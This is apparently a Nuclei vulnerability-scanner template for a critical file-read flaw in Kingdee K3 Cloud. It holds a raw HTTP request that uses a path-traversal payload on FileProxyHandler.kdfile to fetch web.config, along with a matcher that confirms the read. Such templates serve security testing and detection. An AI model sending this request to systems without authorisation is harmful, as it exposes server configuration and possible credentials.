http:
    - matchers:
        - dsl:
            - contains_all(body,"<?xm","PerfTransMaxLength") && status_code==200
          type: dsl
      raw:
        - |
          GET /FileProxyHandler.kdfile?Area=0&F=..%2F..%2Fweb.config&Ope=SDL&Step=100000 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
          Host: {{Hostname}}
id: Kingdee-K3-cloud-FileProxyHandler-file-read
info:
    author: Kingdee-K3-cloud-FileProxyHandler-file-read
    name: eKingdee-K3-cloud-FileProxyHandler-file-read
    severity: critical
    tags:
        - Kingdee
